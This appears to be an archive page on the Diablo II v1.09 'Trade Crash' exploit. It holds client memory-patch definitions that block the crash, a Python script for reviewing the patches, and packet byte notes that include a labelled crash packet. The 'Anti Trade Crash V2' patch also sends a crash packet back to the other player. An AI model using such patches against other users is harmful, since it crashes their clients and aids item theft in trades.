NAME
Diablo II Trade Crash Hacks — A collection of packets and patches for both executing and defending against the infamous 'Trade Crash' exploit.
METADATA
| Platform: | Diablo II |
| Era: | 2001-2002 |
| Status: | Source available |
SYNOPSIS
TradeCrash.dat — Definitions for malicious trade packets and anti-crash countermeasures.
DESCRIPTION
The Trade Crash was one of the more disruptive social-engineering exploits in Diablo II v1.09. By sending malformed or illegal sequences of trade-related packets, one player could forcefully crash the client of another player during a trade window.
This entry includes both the “offensive” scripts for triggering the crash and the “defensive” memory patches (AntiTradeAndCounter.dat) that I developed to intercept these malicious packets and prevent the client from crashing.
KEY FEATURES
- Anti-Trade Crash V2 — A sophisticated countermeasure that detects crash attempts and automatically sends an “accept trade” response to mitigate the exploit.
- Packet Analysis — Clear documentation of the specific bytes (4f 03, 13 00, etc.) used in the transaction protocol.
- Movement Blocking — Patches to block “Closing Trade” packets sent when moving, a common vector for desync and crashes.
NOTES
Protecting oneself against these crashes was essential for anyone participating in high-value trading on Battle.net, as “scammers” would often use the crash to disconnect a player and steal items.
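For reviewing the attached patch definitions without applying them, this added example (not part of the original archive or the author's tooling) parses the `start`/`end` entries and flags rows that write into zero-filled memory or carry readable strings. It assumes each row is address, expected bytes, replacement bytes, with `**` meaning the expected bytes are not checked; that layout is inferred from the listing, and `parse_patches` and `triage` are names chosen here.

```python
import re

# Rows excerpted from the listing on this page, trimmed for the example.
SAMPLE = """\
start v1.09 Block Closing Trade Packet When Moving After Asked
#In town
6fb25487 ba02 eb13
end
start v1.09 Anti Trade Crash V2 2 Final - Written By Arsenic
6ff75352 00 01
# " has tried to crash you"
6fc0675d ** 2068617320747269656420746f20637261736820796f7500
6fc06720 0000000000 f1ffc20800
end
"""

# Assumed row layout: address, expected bytes ("**" = not checked), new bytes.
ROW = re.compile(r"^([0-9a-fA-F]{8})\s+(\*\*|[0-9a-fA-F]+)\s+([0-9a-fA-F]+)$")

def parse_patches(text):
    """Return {entry name: [(address, expected or None, replacement), ...]}."""
    entries, name = {}, None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("start "):
            name = line[6:].strip()
            entries[name] = []
        elif line == "end":
            name = None
        else:
            m = ROW.match(line)
            if m is None or name is None:
                raise ValueError(f"line {n}: not a patch row: {line!r}")
            old = None if m[2] == "**" else bytes.fromhex(m[2])
            new = bytes.fromhex(m[3])
            if old is not None and len(old) != len(new):
                raise ValueError(f"line {n}: expected/new length mismatch")
            entries[name].append((int(m[1], 16), old, new))
    return entries

def triage(rows):
    """Summarise one entry: size, zero-filled targets, embedded C strings."""
    text = [new[:-1].decode("ascii") for _, _, new in rows
            if len(new) > 4 and new[-1] == 0 and all(32 <= c < 127 for c in new[:-1])]
    fills_zeros = any(old and len(old) > 1 and not any(old) for _, old, _ in rows)
    return {"bytes": sum(len(new) for _, _, new in rows),
            "fills_zeros": fills_zeros, "strings": text}
```

A row that fails the pattern, such as an `end` fused onto the next `start` line, raises `ValueError` with its line number, so extraction damage in a listing is caught before anything is trusted.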
ATTACHMENTS (Browsing /usr/games/)
start Note Written By Arsenic, a.k.a Artemis`Entreri
end
start v1.09 Optimized Keypress Functions In Trade Screen
#Allow you to use key functions while being in trade screen or asking someone to trade.
6fb27fc3 33c9 9090
end
start v1.09 No Writeback Bug With Chat Box Fixed
#Fixed a bug in D2 that was preventing you from using the key functions once the chat
#message box is opened when you're currently in special conditions : Stash, trade,
#gamble/buy screen, etc.
6fb28509 a164 eb4f
end
start v1.09 Anti Trade Crash Version 1
#Prevent you from crashing with the trade crash.
6ff64a60 66f745fc1008 e8a208010090
6ff75307 00000000000000000000000000000000 3d020000007505b82053f76f66f745fc
6ff75317 000000 1008c3
end
start v1.09 Block Closing Trade Packet When Moving After Asked
#In town
6fb25487 ba02 eb13
end
start v1.09 Block Closing Trade Packet When Moving After Someone Asked You
6fb2540d ba02 eb09
6fb2542c e8af7ef8ff 9090909090
end
start v1.09 Anti Trade Crash V2 2 Final - Written By Arsenic
#Check if someone attempted to crash us, if so send back accept trade packet
#and bCrash = true
6ff64a60 66f745fc1008 e89b08010090
6ff75300 00000000000000000000000000000000 3d020000007543b82A53f76f60e821c9
6ff75310 00000000000000000000000000000000 b3ff8b155453f76f8bc82bca81f9c409
6ff75320 00000000000000000000000000000000 00007225a35453f76fc6055053f76f01
6ff75330 00000000000000000000000000000000 66be02006a07686053f76f6a01e83ec4
6ff75340 0000000000000000000000 c8ff664e6685f675eb61c3
#Accept trade packet
6ff75360 00000000000000 4f030000000000
#Trade packet
6ff75370 000000000000000000 130000000000000000
#Crash packet
6ff75380 00000000000000 4f070000000000
#Recv Packet Checks
#--------------------------
#- Packet 7700 = Asking someone to trade -> Send crash packet
#- Packet 770c = Trade screen closed -> send back ask to trade packet
#- Packet 78 = Other player infos when trading -> call :SomeoneTriedToCrashUs - Get other plr name and slot
#--------------------------
6fc0166f 8bfdc1e902 e8894f0000
6fc065fd 00000000000000000000000000000000 803d5053f76f01753d6066813b770c75
6fc0660d 00000000000000000000000000000000 0e6a09685d68c06f6a01e864b1ffff66
6fc0661d 00000000000000000000000000000000 813b770075156a07688053f76f6a01e8
6fc0662d 00000000000000000000000000000000 4fb1ffffc6055053f76f00803b787505
6fc0663d 000000000000000000000000 e81b000000618bfdc1e902c3
# " has tried to crash you"
6fc0675d ** 2068617320747269656420746f20637261736820796f7500
# "Attempting to counter crash..."
6fc0677d ** 417474656d7074696e6720746f20636f756e7465722063726173682e2e2e00
#Someone tried to crash us - Count and copy name string
6fc0665d 00000000000000000000000000000000 6033c941803c0b0075f9498d7301bf5d
6fc0666d 0000000000 68c06ff3a4
#Someone tried to crash us - Print who tried to crash us and counter crash messages
6fc06672 00000000000000000000000000000000 6a1859be5d67c06ff3a46a13685d68c0
6fc06682 00000000000000000000000000000000 6fe878000000803d5253f76f0175276a
6fc06692 00000000000000000000000000000000 0f687d67c06fe8630000006a0959be70
6fc066a2 00000000000000000000000000000000 53f76fbf5d68c06ff3a48d43118b00a3
6fc066b2 00000000000000000000000000000000 6268c06feb07c6055053f76f006a0768
6fc066c2 00000000000000000000000000 6053f76f6a01e8b3b0ffff61c3
#Print messages to screen routine
6fc06700 00000000000000000000000000000000 8bec68000100008b5504b9ad68c06fff
6fc06710 00000000000000000000000000000000 156ccbb66f8a5508b9ad68c06fe8feb4
6fc06720 0000000000 f1ffc20800
#Counter crash boolean - 01 = Counter Crash
6ff75352 00 01
end
TECHNOLOGIES
- Network Protocol
- Packet Manipulation
- Exploit Development